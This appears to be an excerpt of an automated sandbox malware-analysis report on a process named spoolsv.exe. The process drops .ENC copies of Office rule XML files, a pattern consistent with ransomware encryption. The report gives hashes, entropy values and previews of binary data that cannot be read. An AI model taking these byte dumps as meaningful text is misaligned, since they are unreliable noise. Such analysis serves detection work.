                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t....F......@.c.......c.&...0..>G$.P.Hd...^...JZ...x.g.A....k.@!/....F=.y..........(.T.m.....pg..gW..]9.r......l9.n.....su.1g....HMoL.F.8kC.....S.s.<.uS(...#......B@D.....3e+..w.D.J.L.......p..D.jLZ.>\.....u.y...uj.D.]....d. ....^....N.<.$..3.....3.63.>G*l2.*{..d..... r}....[..;.....fy.|....<C..b..|&Gr....T.*0....IdM..,/]R.B>..-.0...[.i....!.<|.7.7;..+...G{H....ec...a.?..pb.A..s..*C...*..;G....T.l..7.J..C%)...,e..P.#...hJ....<..zu...;.I.Q..dY.i..e_..'P?.@L.o.g._f..6.7.7.j.V....I'....>....n]K.dxyc....8,..Z$....%.{..<".J{.._V.PjfN3.sYv^....H\..3"t..>tTh.U...H[.........W"..2.tu..H.$C#T..6.*.+./..B?...5.....z....o../.y|i.....+V."|..&pR.....q.J.+...EjD..E.|. ..)8 ....=_.....P{...2.}.;...2....>.......3..>..z....o..I.6.=..].=.SK......Q.MB...lL..uN...m.Y....A.a{..ALN.U.......J.d.5..I5."=x.......;J.k.0....1.-.."....[.4..{.).i.....~......Qd\yq.P.&.b....l/....7.0..e......Ex.....%..U...Q...pKu.Z...$B

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701501v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.886434867563831
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/XaiKWzxAdozXtZrP3kyyep1cCoM/GcsXpdr6izXT5NA+CPI0p:/3zOAtpLhp1hxLsXpImT5NAzQ0p
                                                                                                                                                                                                                                                      MD5:41F9C5CE02617B44227AF909875431B7
                                                                                                                                                                                                                                                      SHA1:8F71A66FF724D18423312D35E93218BD5BF0A3B2
                                                                                                                                                                                                                                                      SHA-256:6D101FA42028AE3A258D410F88E804D6F80D8FB34A52AEDAC4DE139DC5DF69C5
                                                                                                                                                                                                                                                      SHA-512:5A75AD5FEBF41AF55AF00CA51258A4ADCAB592E24121451F4B83838FEB2B8DEC07E43F5AF96B959286B150840465F7D68BEA50B06257D015EFB00CF7748A2393
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.aaV0.....@.^..`...AX.]hp....80d.ya.eh....S..&2&._!..e........0{!%tS.&Z..?D..&.Z....G..h.5.......Li!W"....n.Y.7D..ya.+.1. ...t.Y.Y .c........5S.......Fs.MY..0+..X..x,KQwo....W..{._.`.D..V....ER..Y.[...Vk.3.i...iT...<..u.-J8....`b.24.%....|b..z'.~.....o .f.q...]^...N..d.O..\:k!).4.^.G2:a .EU...r...&.gb.q`....I.i.K...R..a+........RA#H.0.J...(~..9.l.......4V......{....7.^..9.r#..W..j`.Z...I.p......-..._0.j1..V.aK.#.=r..R......?B..5.d{..]a.$]..W....A~v........YM|..7!...q<.?.o3F?...~<U.m(.>..O.Z.......Tt~/L...."E6XfR.<.V..........Q<Ni.H...K.~A5Gv.......v....../....H(LU......k."5....lW...?..y.v:C...!..%.A~Qn..1y..'....?.x.._.&..(..6.....fS.m...R..$.....d2%.a.....t...P.n.e.....*M5.<...W...x...M. ..w.....7.............#nT.{b+ig...){qs.).}-..P.t.d.......=.0..c.k...we^...!.[}...VzpK..^B..<.I$..A.p./..7.=|..y..9.V........o..mY.=.WC6.....6.j.U..2.C..$p.u\._3.n.........K.n./..C............Z)db.J

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701550v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.876260694223355
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/jiiux7UGmkOnaCmHDG5JEUNLtp7fO5aIwn7gG1m5ksr:/OBiaJHDG5JEUxfLgG1Q7
                                                                                                                                                                                                                                                      MD5:7670C094F6F663E3A5E6C0FD01AA9E13
                                                                                                                                                                                                                                                      SHA1:851ABE2B72DE50AA6D2F388400C1B5F77349DBE8
                                                                                                                                                                                                                                                      SHA-256:50706F932BA7092C08ACA6E41EEC85EFBD068C8AD3CB45DCAF87D39DFB153F10
                                                                                                                                                                                                                                                      SHA-512:536493AB71E7BA8AB2F8D71266658D8630D13E9D6B150D2AD85DC473EFCDB86A0E4E23DF7B239CD490468B9A6C34C6103DAE59E30A666788068C90E11359943A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..1...V.S}b.vO.8|.z:...j.e.>.._..........p...Ym.@.V..p;.....kz.}!)8q....<m.B.?}7.}.s.*..Z.f...Q......S..I.rK..`..{1..r.b......[..%....z..(..|..T....p..Xxj.........Y.D.......g...1t....:..L...6R.a.T..p.... 5Em.R..oe.Kt=3..o.h.!?...,f..!.ut...h..}..^..W...........,......h..U0.E^./...D.P. .r...R......;..:..........=g...&..A..C....#...Ayn.....'"9[.`.....?...h..../g.`uD.#...<..5..6..(...(~.Ua.i..Y'..b}..&..c..5.:..p...}...~.q...V.2.2..0^.;..b9...4H...k<.{.........!...."...c-W.....w.'..c...+...]..!q.t;..vl...28p.......8E.../..s5..<..].....`..f....bH..8..L.....v'.J...O/Q.....Q.HF.>.,Y....g<..]-.".K....!>..=..a....[.:..^.#.tkh..,./.|}.Mk......K.H..n.....@...u..5.....N..w..K.9G.....L2.. ......b.6l..,.,v.N.p.p.t`5........p._E\.{...E.+...=dS./i.b...a..CN.e;.R|........a.;..N......k.+Jey.d..n..v.O...4Z.kL..f.....-w..m..9.....l0)..7.......&.Q..lk0c......J.7..D...Hh5.2wE.3t.j;..p.=.D9...RG'..u.^.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701551v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.854477317246078
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/PVyAeXXLrbF6GnITdoRNpKLYsGNoWlgAx+lbmnZsKejJCJlMyQM9On:/NyAenLrZ62IBWNg3yx+lbm9egkyQM9O
                                                                                                                                                                                                                                                      MD5:460A4D5681ACA0D0BE9C771FC69DCA6B
                                                                                                                                                                                                                                                      SHA1:B7EC246F0DEEF8C75BE71761E7D792C5296B0D91
                                                                                                                                                                                                                                                      SHA-256:F14FF00D4BE250A8CEC0CEB79F441D9942033CC15705D84596E10B188E1698EA
                                                                                                                                                                                                                                                      SHA-512:04FC8BF15460E05E0598CAA4620D41F9936CEA488351B6C1BB197F036763FC62AE0D67B1ED8DFAFCC847077D6134D7B446CE0A0D3B4A7A7058460E0F521E5B5F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t...[".'&......Ivq......&....du...........!.....9{5..A[...e8n=.:.h.'.4.e.f..e@.....io.i]....R'a)...dT+..*..g._k...L....e....&.d.V........4.. ..t.....\.............h.9.N.v..$.u...r..8&.MGb.6i.!r..p{...`....W..{.l&..a...:.....$......R...*..e.&?.Vj.....F.;}6D....,r.k...a+..I)a.`._..9....~...T!.....&{....,..pG.cl......"p.7.".$.p4.IsT..K.b..Z...}p..X..D..'.<...GM......#n..ShO.......x.;....F.........gV.V.......&...$...^..K3...#....^..p.q.@.....X.....eMZ.I}S+..k....^...!.S#.W..'[>OXQ.).&.....!..N}.;.,/..h...1.^X....|. .g....S...K...g..U.n.2..o-.Kq<...kq..p.......3....!.1]Bg..Jm....@...k.....el.~..F.U.Y2...5P._..q.Y.b.X....s.x.HH.!.d~..?.......a*......i.[j2@....3.G...........V..7-.F.(.s.c.H..aG/[......LB0........'..L06..x(78..?..L.9[..%... Jo...<=w.hQ......*(.i...F...8...`..!.n...+c..k.......rl.6]D|....Z.F.m.....TZ[v..x.Z..-f}.,.je..\u.X6.Y.I?y.T.....,Z.{l.KG.b..u...x_..Ao.B.*.pk.l. ......=&3....ah).B..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701650v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.859237151614467
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/9KPEIegdRCG54iJDScm/MfwN8HhDEow9mvt58UjDzNGPCPpCt:/9KegdRX4O1LfwiheAvP8UjPNGPCPm
                                                                                                                                                                                                                                                      MD5:A090E42AF70F4353B68B1B78175671CB
                                                                                                                                                                                                                                                      SHA1:94E93E5AB070743F86EEF234B6946A60FBF01762
                                                                                                                                                                                                                                                      SHA-256:DFBEC2FE28804E8BB9CB27D925B0590721E73AEB3A4FE11FF6051028F0A61DC3
                                                                                                                                                                                                                                                      SHA-512:533B17B58E198352F492CDE365F6B13179E611708660120E37CED176FA6BB70587A3F57BDB0A9F611A55DFF40A03CFE6413BEA79F644D5A022802DBBF672DA8F
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..9....H...[.'.u.,.../..M.0...B.....o..+Fr.$.3..b..W}?.....G...4.s.2[..w.`-.%b.-.....IT..].....|e...gR.b.)..s.{...n.........r.Ge.....JU.}..q.}>.qT.>....k..G..<.5........*Bq..(..M..v.c. .j.......Q$o.....F.$.>..gZJ.$...F.+....O..5lL..p.+-<...9.H..Y....`#...$T|>...7a..i.9.....O..x.....VI.8/T.?..,.b.a.-.FFb.......ll..].+X....m.C.......w..$..g...:m......+6.b.$..m...t.V....W.c.....o^.....{..6....~"..g.TU%..E.^..........2"..y..:H.".k).X.L.p=.P............~.q.....AQn..|.)Wa..R..s/~>n. ...G...x.}..<..,..q.C....=..O8.....4*"..f.../.R_..w....c m.$.o..wZbQ........vy.......o2....._....2*....7.,W'.I.....I.H..2...^.'..e.2..9.....t..8bZu$...<n.. .i...0..t....!Drm.L.rc-....5..<.w}..^[..H..e....6g...3@.....N..)".c..k...D..z......0.M9>.G.B.a.(7._N........)h.&..t.&..E..D.,...MDGb.EBn...b.^.|X1cx7......Gf...'+.........b.....m9Y....7`!.NO.g{.&.........4.L0...h.=d.I.a.N..C.u...J.kg..i....KZhCXM.]&}..Z...!,`.H....

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701651v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1424
                                                                                                                                                                                                                                                      Entropy (8bit):7.87608919582589
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/mkyPLS+8FZvl1WVsN01UAqtZAJY3/mS2iiTjqLtRSVrVDviU78q82SQWT+7bx:/mkCLKjMsieAQZAa3/mS2LKLtRSVrVDz
                                                                                                                                                                                                                                                      MD5:53A4B25A3A7C290FD9487436265500AA
                                                                                                                                                                                                                                                      SHA1:152F217082C896C67316E288CDD0D9B0493CA6E4
                                                                                                                                                                                                                                                      SHA-256:6CB2EF1ACEAA50436B0E86AD6C5C2D95DED6AF6A8E733CFF271681FDA938F266
                                                                                                                                                                                                                                                      SHA-512:C4992B5ECD7F9E1E9FAAD85953FFD56ED4C5359D72901AE86E8685123059DD27BF01B9BFF073C606F2473FAC70C3C13E149418A355A620F9886A268BD9F4CA04
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.....?..+U....l..p.-%.*f.J..TIl...c..b&.(....3.31.t..?)......h.4.k....0_h.t..c..{..C".8 .iy.NO..or6..3../....Rc.dE.......5./.(.....Q..&.....6.F...AT.....a..*2.....w*6PDf?...^."(..=..K..=[.tU.K.......L.A...G....?tS6g.;.....8..c.5zt_..-...y..E..sQ..}ug.......w.J.t.6.y.k...t.42....62'.3.}...a.r...2U#%5q{...h..f.{.I.d......i..jX{..C"...D.&.......z.....|u..j.P.J...(.?....7.......W<..vi.._.R+{.....B^......B&u.n.....K~..q....1=..n`..(...V4C...&....F....+.....J.........=.....%....0.[.6.........f.)......(\.A..u-.......fl...0...b.......L..r.,...v....A..........]..U..keo).x....:7..%u.....w.u..$d.C.....E...i.. .I....T.....W.nT..........x...DX#...o....v...B-.%{+Y`.-.j....vA.....u..~N9.....xC.....H...DDy...@...DL....wh...S.o..S+.D...8.v.{..5A..x....d...=.......MmM.o|...7\z}1..g7........... ..;...C..h.|[.>k8.]...<X6.......M..Z.9.w.E...p[.....X.3..|....YQ.4.......K..5....k.].ZnR-v...t..}4...6..)...

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701700v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1392
                                                                                                                                                                                                                                                      Entropy (8bit):7.846931438779785
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/3llyCEYfnaN+2Cf3LsieSq344KIe2D+YqCNdAu60oaQD5KuhrV:/qwnaNNYLsTo4Ley+MrAv0oDKix
                                                                                                                                                                                                                                                      MD5:91BD4809898642B605C76CDF4901F773
                                                                                                                                                                                                                                                      SHA1:CED807C0C35BC0E491527F0D1666592320AAA72E
                                                                                                                                                                                                                                                      SHA-256:E0F19ADCA52CED31BB9AD070A5F2242FDDE79F45FC668F67A5F204F39F36EA17
                                                                                                                                                                                                                                                      SHA-512:5184210DBB1B57A6D41186A4D277AB268319252BC8242284FB7F716D0D2658973FA9AD7A2DB0A949ED2A70E38E7AF9356BE5AE9908F03952D7FA3AB19D27DBF3
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.8..pM..."U..W.?.]......C..U.6.... <2.$.c.@..D..*_.jZ5........Xr.L....h..N[...........4N.Uj=-J..`/pA..Wc[=..O.-..6.. ....(.N/.YAu.........Z....TyO........>.f..L9.=.....n.l...+.D...i.(>s.7...o]"..e..l........T........*o....uDU..K.....89.S+.1.......AW../.U.....}..8.`..xjw....j~;.@....&..[q.P..0XQ.?.w......g..*f.4..:...V.x+0T.i/..j.*........p...b.M:.I]..52.......7.v.b.wu..<X B9*:...l~....;(.~.-.>......L.g:....v.r..1...x.lre./....v@..s52./....(.F4..0}8XIkD.....p0....@m.3..)v.$`&4/.'..a.D.. ...52....J4V.:........=.}.G.....P`..j.Xp};....B...<^{/..S` .....B..9.Q..6......zrf..b\.q......w.{..$r.0..8..Z...)..q.<..3..........Q.>.w...`5...f7..8........b.v(...$@.R....>.O.^6y0.#I..y./p.Y(.............[X.9..^....:.u-.u..Im...d.|.[.........i.....L.$..,...4..but1...;.RQ..1.;..X.......%(Q.>...m.7T3%".....P./..q.R.....Bn...US)....Z...#.X^..O.....'a$aP0.H.Y..}..4L4..N.cn...(.........,.<l~...q,..u...g,...3^..'..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701701v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1424
                                                                                                                                                                                                                                                      Entropy (8bit):7.873185339254887
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/8Uaakrp3uwKEzzrjQs3QZtX0fL/+08RYPVxcJvYmwwZztxhdICSquxWTuQZ1mFn:/8UGYwK2HVwtX0fB3PVx0awBb/VMWTuh
                                                                                                                                                                                                                                                      MD5:3737D9D80F6E4ED6BC3BBB3C6FDD5AD6
                                                                                                                                                                                                                                                      SHA1:A4695416CC12BE7A76E06DF4058B2F9B782EE6F2
                                                                                                                                                                                                                                                      SHA-256:182CF91911EAFCFBF7DF014D477A907A6BD717BE0C1032CDB01261F9D1939EFB
                                                                                                                                                                                                                                                      SHA-512:5112CE9A82662D5BA940B1896C16BE9418C0024E7F27C2CB12A81DB575132E4199B0E34BE901D598EC1688BA1D05CDDB0007C3893027B3AF885D9F645662ADC4
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t.&d n.a*......ae...w.?.+q.....\.}.t.jE&..d....4.....g....W.o..$..nm..2...C..?.UN:...x...H......r.2....3...........~!.D...-..z..2.CF6.V.`..q.s.t.@zA..M.f..=.xP........x.....D..u...Xj..;.Pm.PMw(.].Ne3f.l._R.;V...F<.:/+V.*..a.n..`Q.7_..?.b;..T....#E..?.T=)..~........~..iWv._.4..c.>r..M.v..A.......(...0..3u....5r_.tF\;..l:...`O"....>Z.C..0.......\.&.v..#\.(.P..............eV.Wd...'..#2...#../>=..?.e7.XrV.......:.+sH.NPc.e;...7t].K.(z]....zcYx.Rh..?4.I..%.^.o..>...ca..ax>..[7=Cf.l.3.b....).T..R!.%T.3..)7b...*.m......*-X.#..q..NC&..VU..$_8......n...#^}.M...&..8...U.cB.._;.JECs.v.R...........3...N;....Q....@P.N.P"...?6..__.k..:..Z`..ge...M.....2qE..1..Y`.I.s.{[O.... ..NHe...'.....B....)...%b9....).%.=.D...D{xG.["..........az.Ha..;;.M.....dG.._.S..U..q.*QE.TH.L..:....oy..C+.......zW.p...v..d*.9G;0...o..zWFM.(,.)1../.+5...5...`....J2./`.z.!...T9....C..V>[.b..x2.CDJ......5..Q*..;....j=4.......H.~h.L.VK.w..^.9....9

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701750v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.8589673418052355
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/Du1i19dq0JEdJbDA8Np2/2HhPe3QGpIhvdRG9PLmu7zFRLtfsqciYxNwn4R8atu:/DGiFqUoJbk8n2+HhP7thEL9RLtfFc3I
                                                                                                                                                                                                                                                      MD5:A426170E68EE67B1F91ED0F96DB15065
                                                                                                                                                                                                                                                      SHA1:D515813289DCF5DA1E0FA62522CC65B0AEE9ACA6
                                                                                                                                                                                                                                                      SHA-256:D8BCE220ACE0F626E9D1A8F4A7209C05354A50F019BD49852222685BB5AA1C11
                                                                                                                                                                                                                                                      SHA-512:DCC4796137FC33143005CA40BD4012DA6C3EE725BBE6196DBBD4C4A2F770DD68D6E3692D311A5286E4EBAD5CBA82EAF88C8D0FA2BB02F09D232E7CC599250639
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..8...-..y=..).d..j;}...=....m..1..i..W3....L7.Y.T0.hZ....s...J."...I.....&+ q.dg..tS.1.....l~-.....`...;i.q&..k..L.]...dK&........*.q.../..}..s.5..-....&.DK.....u.lZJyg...>...=.NN..-z.>..X_.....z..h.Q............!&.",..../*..5...K...k:.._.P.K.....7?.q<.@./q..t.-\.o.o...~...3.L)./gd..<}J+[.'.n,.EKbL../.....$...E......G..].y..K.&]h..^.y_...~8......x.g..%.s.k..n.....l...o..b""U..4c.1].L./.?Q=?J..e4s....5....N...x|...{c...$j.....Z..Og.?F..........r.....y.-..()R...%F.r........?7.+..Y.._.........:Sv..s.5........Xk......'...g].,..HL.)3..d.7.Tb.K.jd.$..[......_X.p....V.....I.{*..... .+....O....<.$4g-O.v..Q.-*.y....".=[..*0.....^.i[?E..[1.t...R..`/...g~\.?..*<.R.C....e._...i...p.c.....1.p.X..?.=H(2X8.......C. ......8.....%.a.N...*....x...>,S..i.[.".$...m>...%..@L...b...9f.]#....;=....M.....~.*...h...d..^)$c.W5G..G{.P..e\a..{._.......$.I..N.h......F.'..x-...n;..t.ys..y8.....4.o.,.V......w..8.4.!.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701751v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.878118260161811
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/a90iBFTBSmTBgli4R/X6aeZkVRBjqPiJ3VzEKVUk98gUC7ooJjK5QnY+HWxPwm:/aac+iBglisXXeZkVRBjqPgl4K2W8Voc
                                                                                                                                                                                                                                                      MD5:DA507BE31397279A95CD0C4D5501C770
                                                                                                                                                                                                                                                      SHA1:CADD8B4BD9A49BC5A57852A7B74EA057960B278E
                                                                                                                                                                                                                                                      SHA-256:BC09D8286157C1AEF145C2A2BCB86CA971BC5514F19EBAB05BAEA3D412D03F10
                                                                                                                                                                                                                                                      SHA-512:1267748E985DC72327B50EC06E648D9BCEA2A669EC1BE50CF7CC2774A60BD2BEFE6D34182EE7A601A043308788DCC8FBA742D2A9E30D8B7BE54C95200C7280CE
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..U.P...z.........2...W;..P.^4h......i._b..@;....B%w.....'..dv:iK.ea.#.).6|;*_L..OK....O..b.DV.Je. ..e5.JI.Ow..9.m......V.v.u..4.......f.....c.......5h._WB9h....$./...Bu.uSL......f:.[.C*.I$............u1......[.....8.N}..N.H......,Q..?=.....=..7}..94....m.Ew.O.E.r.K... kX7kQ.(..%jG..+......>.9..._QP..~].,."..].....p....O.2.o....2.J?..."qY._(..#*.)...x....M....R*\.I.3......p......1.IvZ.Xq..CB.0.)rE..6...8...g..{K+...*..hr:q.6".N-9I.%Z....^.d....n..P...w....B.Zg.?.. M]..'iKpS...i...47..@=E~.J.\...m...'.+..<.f.4,.......]y...bK.....Zl..Qq.<..jf7.O..........Wc}.3.k.h...W.y...6.a.:.....L...j.C..:...'a?...{/R!......,0....?....L>~..WR.^.So...*Z..5..C....3.g.>*.c.6z.Zj%.N......wL....."..p........-.........Ka.N.Q0..U.v.gc..4.X.'ZR..H@.Q.>...X.....i2..t...{......6...=..]~.N.$.?A..{GWp5..Z..6...:`..$.[..K...1.!.U.\..<.E.lUR...$.:.k.."..K...,./.uB{.....E...PFAj...._...e#.#.n...a.............7

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701800v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1376
                                                                                                                                                                                                                                                      Entropy (8bit):7.8758522830733115
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/1VaMM4Hr7fDy+Tj3bkRBVeAj/UAhtb2A7NAQC6TQsdd0GxKE8u0Uac9Q35h4B5G:/1VaMMar7fDyK6ey/UUb2A76QD3d0MHu
                                                                                                                                                                                                                                                      MD5:43A83150E49047A9AD317EE632844643
                                                                                                                                                                                                                                                      SHA1:831486C8E15D63DA3B28510E63EE5AB46A816748
                                                                                                                                                                                                                                                      SHA-256:3EF0F4EC5C3A16E2B5B2BD29CD7DB1836115C498CED3A7A6915FCD0500101105
                                                                                                                                                                                                                                                      SHA-512:95D50DAC5FFBA138480CC8A09D3957F7A4F4030B5CE533CE889DD22675D539CFE9AB95F4F56BEFAD0ACA91EB96A60546B995A061344B0D0CB1EC92679032B398
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:....z...8.....&.?;..j... .8rl49...y|.Gqq.2.[t..?..;B.D~y.yP.1w6|.bW.L........w.x.FyeZ[../s.td...#..;.UD|..B?3.*m.A..0..J.!Dd{......Sv.....PRr.o.7Tq..l.0.#.g|.os....TIi...D..i.RV......u..(..n!.7.Kf..$e.=.-~...o.M..q..<.....2...........;*.r....`..&*d.2..O...4..B.{.Gpl.....O..M...6]]......R..x.x..8.......N\.8......+.j....=...[j..@A`..B..m....Y...n.,"..)=...~~.qBIY.*#."F.UB.7E/l.......u....#.....wcb..Y...M..PR,;#By.S..j.......y.....d.i..........*,.f..}.j..f...k.M"Ot..S...F'...+...O..Aq...u.D....R.L..P..,...n.OM....^Y.$&......0..m.%v....I:.Jt.....W.........g`...1Y..:.X.MC...HM-a....m.y.I7..s..S..@m..{.....|..e%;C..-p.H./r.......-.kBdt8...lH....._.y...f..=......i..$....LP...........X..O..sw.d........-I.&&S?.......}|=.d.L..p..#,.+q..S].N3.>..}L.....LP.b.W_......O..`$..DP.4...cqo......._....V...J.>.K..U$.Y...f%.".6xw.. b.D....5..{...hUlE.>!G.....J..wR$C....*E.l`'x.].g..3D..'..y2.S..M.t.E..q}.L..K.?#.)r.._....P.......J.H....6.`...Y..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules\rule701801v1.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):1408
                                                                                                                                                                                                                                                      Entropy (8bit):7.84998502009065
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:24:/4JtCgXMXd1mdrwFcAMzoul11zYrNWz7nSLZhBcs6JyTX32LhGNw2+c3gQ:/4JmNJmAMzoulzzYgfGcse7hUhHh
                                                                                                                                                                                                                                                      MD5:E2B2F0CEE9D06C487C8BBB5ADAFB4364
                                                                                                                                                                                                                                                      SHA1:C387699BE297DFE796BAFED0A4B9ED75F1624D56
                                                                                                                                                                                                                                                      SHA-256:7CEFB3A3FD6E95454E47D84F06289877E1AE73A96C00E682DB8344102C17D1A7
                                                                                                                                                                                                                                                      SHA-512:DB874E6007F4FCC971AE15B02F5E1F76159D8B628F359D6E90F76982F6082C8DB51F9BA445D6AEC182173816BD31337354F3F45586D49A2AF878F4A2419D53B8
                                                                                                                                                                                                                                                      Malicious:false
